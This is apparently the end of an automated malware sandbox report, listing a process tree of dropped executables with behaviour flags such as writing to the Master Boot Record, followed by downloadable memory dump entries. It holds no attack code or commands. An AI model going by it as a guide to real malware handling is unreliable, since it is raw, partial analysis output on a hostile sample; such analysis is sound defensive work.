                                              PID:4604
                                              • C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe
                                                "C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • Suspicious behavior: AddClipboardFormatListener
                                                PID:1908
                                            • C:\Users\Admin\AppData\Local\Temp\6ABE.exe
                                              C:\Users\Admin\AppData\Local\Temp\6ABE.exe
                                              1⤵
                                              • Executes dropped EXE
                                              PID:4444
                                            • C:\Users\Admin\AppData\Local\Temp\731C.exe
                                              C:\Users\Admin\AppData\Local\Temp\731C.exe
                                              1⤵
                                              • Executes dropped EXE
                                              • Writes to the Master Boot Record (MBR)
                                              PID:4848

                                            Network

                                            MITRE ATT&CK Enterprise v6

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads

                                            • memory/436-105-0x0000000072940000-0x00000000729D3000-memory.dmp

                                              Filesize

                                              588KB

                                              Download

                                            • memory/492-41-0x0000000072940000-0x00000000729D3000-memory.dmp

                                              Filesize

                                              588KB

                                              Download

                                            • memory/524-101-0x00007FF915C00000-0x00007FF915C7E000-memory.dmp

                                              Filesize

                                              504KB

                                              Download

                                            • memory/572-247-0x0000000004E70000-0x0000000004E71000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/572-246-0x00000000031F9000-0x00000000031FA000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/788-115-0x000002A035C70000-0x000002A035C71000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/788-117-0x0000000010000000-0x00000000100B9000-memory.dmp

                                              Filesize

                                              740KB

                                              Download

                                            • memory/1048-108-0x00007FF915C00000-0x00007FF915C7E000-memory.dmp

                                              Filesize

                                              504KB

                                              Download

                                            • memory/1372-113-0x0000000072940000-0x00000000729D3000-memory.dmp

                                              Filesize

                                              588KB

                                              Download

                                            • memory/1620-86-0x0000000072940000-0x00000000729D3000-memory.dmp

                                              Filesize

                                              588KB

                                              Download

                                            • memory/1780-37-0x0000000010B40000-0x0000000010B41000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/1780-30-0x0000000072940000-0x00000000729D3000-memory.dmp

                                              Filesize

                                              588KB

                                              Download

                                            • memory/1780-32-0x0000000071790000-0x0000000071E7E000-memory.dmp

                                              Filesize

                                              6.9MB

                                              Download

                                            • memory/1780-35-0x000000000EAF0000-0x000000000EAF1000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/1908-358-0x0000000004E60000-0x0000000004E61000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/1908-357-0x0000000003238000-0x0000000003239000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/2044-137-0x0000000000820000-0x0000000000821000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/2128-97-0x0000000072940000-0x00000000729D3000-memory.dmp

                                              Filesize

                                              588KB

                                              Download

                                            • memory/2236-73-0x0000000003630000-0x0000000003A93000-memory.dmp

                                              Filesize

                                              4.4MB

                                              Download

                                            • memory/2236-63-0x0000000072940000-0x00000000729D3000-memory.dmp

                                              Filesize

                                              588KB

                                              Download

                                            • memory/2244-74-0x0000000003D80000-0x00000000041E3000-memory.dmp

                                              Filesize

                                              4.4MB

                                              Download

                                            • memory/2244-65-0x0000000072940000-0x00000000729D3000-memory.dmp

                                              Filesize

                                              588KB

                                              Download

                                            • memory/2776-92-0x00007FF915C00000-0x00007FF915C7E000-memory.dmp

                                              Filesize

                                              504KB

                                              Download

                                            • memory/2780-77-0x0000000010000000-0x0000000010057000-memory.dmp

                                              Filesize

                                              348KB

                                              Download

                                            • memory/2780-76-0x00007FF915C00000-0x00007FF915C7E000-memory.dmp

                                              Filesize

                                              504KB

                                              Download

                                            • memory/2784-140-0x0000000001120000-0x0000000001136000-memory.dmp

                                              Filesize

                                              88KB

                                              Download

                                            • memory/2784-252-0x0000000003270000-0x0000000003286000-memory.dmp

                                              Filesize

                                              88KB

                                              Download

                                            • memory/2784-258-0x0000000003290000-0x00000000032A7000-memory.dmp

                                              Filesize

                                              92KB

                                              Download

                                            • memory/3556-49-0x0000000010000000-0x0000000010220000-memory.dmp

                                              Filesize

                                              2.1MB

                                              Download

                                            • memory/3556-45-0x0000000072940000-0x00000000729D3000-memory.dmp

                                              Filesize

                                              588KB

                                              Download

                                            • memory/4144-248-0x0000000000400000-0x000000000040C000-memory.dmp

                                              Filesize

                                              48KB

                                              Download

                                            • memory/4148-328-0x0000000009D60000-0x0000000009D61000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/4148-326-0x0000000009B00000-0x0000000009B01000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/4148-310-0x0000000008310000-0x0000000008311000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/4148-330-0x0000000009D40000-0x0000000009D41000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/4148-302-0x0000000070EE0000-0x00000000715CE000-memory.dmp

                                              Filesize

                                              6.9MB

                                              Download

                                            • memory/4216-341-0x0000000002A00000-0x0000000002AF1000-memory.dmp

                                              Filesize

                                              964KB

                                              Download

                                            • memory/4284-151-0x00000000008E0000-0x00000000008E1000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/4304-154-0x00000000031B8000-0x00000000031B9000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/4304-156-0x0000000004D40000-0x0000000004DC5000-memory.dmp

                                              Filesize

                                              532KB

                                              Download

                                            • memory/4304-155-0x0000000004D40000-0x0000000004D41000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/4332-159-0x0000000003298000-0x0000000003299000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/4332-163-0x0000000004CC0000-0x0000000004CC1000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/4332-161-0x0000000004CC0000-0x0000000004CC1000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/4360-180-0x0000000004C20000-0x0000000004C21000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/4360-179-0x0000000003158000-0x0000000003159000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/4364-266-0x00000000072D0000-0x00000000072D1000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/4364-269-0x0000000008510000-0x0000000008511000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/4364-282-0x0000000009550000-0x0000000009551000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/4364-281-0x00000000095F0000-0x00000000095F1000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/4364-280-0x00000000093D0000-0x00000000093D1000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/4364-279-0x0000000009060000-0x0000000009061000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/4364-261-0x0000000071200000-0x00000000718EE000-memory.dmp

                                              Filesize

                                              6.9MB

                                              Download

                                            • memory/4364-262-0x00000000047D0000-0x00000000047D1000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/4364-263-0x0000000007390000-0x0000000007391000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/4364-264-0x0000000007220000-0x0000000007221000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/4364-265-0x0000000007B30000-0x0000000007B31000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/4364-272-0x0000000009280000-0x00000000092B3000-memory.dmp

                                              Filesize

                                              204KB

                                              Download

                                            • memory/4364-267-0x0000000007C30000-0x0000000007C31000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/4364-268-0x0000000007AF0000-0x0000000007AF1000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/4364-270-0x0000000008300000-0x0000000008301000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/4440-259-0x0000000000674000-0x0000000000677000-memory.dmp

                                              Filesize

                                              12KB

                                              Download

                                            • memory/4440-257-0x0000000002120000-0x0000000002121000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/4444-355-0x00000000033B8000-0x00000000033B9000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/4444-356-0x0000000004D30000-0x0000000004D31000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/4556-171-0x0000000010000000-0x00000000100E4000-memory.dmp

                                              Filesize

                                              912KB

                                              Download

                                            • memory/4604-347-0x00000000030D8000-0x00000000030D9000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/4604-348-0x0000000004CB0000-0x0000000004CB1000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/4768-336-0x00000000031E0000-0x00000000031E6000-memory.dmp

                                              Filesize

                                              24KB

                                              Download

                                            • memory/4768-200-0x0000000003060000-0x0000000003075000-memory.dmp

                                              Filesize

                                              84KB

                                              Download

                                            • memory/4768-340-0x0000000003260000-0x0000000003267000-memory.dmp

                                              Filesize

                                              28KB

                                              Download

                                            • memory/4768-339-0x00000000095D0000-0x00000000099DB000-memory.dmp

                                              Filesize

                                              4.0MB

                                              Download

                                            • memory/4768-338-0x0000000003200000-0x0000000003205000-memory.dmp

                                              Filesize

                                              20KB

                                              Download

                                            • memory/4768-337-0x00000000031F0000-0x0000000003200000-memory.dmp

                                              Filesize

                                              64KB

                                              Download

                                            • memory/4768-335-0x0000000004F50000-0x000000000515F000-memory.dmp

                                              Filesize

                                              2.1MB

                                              Download

                                            • memory/4848-359-0x0000000003348000-0x0000000003349000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/4848-360-0x0000000004EB0000-0x0000000004EB1000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/4904-254-0x000000000067E000-0x000000000067F000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/4904-213-0x00000000022D0000-0x00000000022D1000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/4908-253-0x000000000082E000-0x000000000082F000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/4908-209-0x0000000002310000-0x0000000002311000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/4912-195-0x0000000000860000-0x0000000000861000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/4928-220-0x00000000007C0000-0x00000000007C1000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/5048-238-0x0000000003148000-0x0000000003149000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/5048-239-0x0000000004C80000-0x0000000004C81000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/5052-285-0x0000000071200000-0x00000000718EE000-memory.dmp

                                              Filesize

                                              6.9MB

                                              Download

                                            • memory/5052-298-0x0000000008C70000-0x0000000008C71000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/5052-299-0x00000000092D0000-0x00000000092D1000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/5108-197-0x0000000003023000-0x0000000003024000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/5108-198-0x0000000003940000-0x0000000003941000-memory.dmp

                                              Filesize

                                              4KB

                                              Download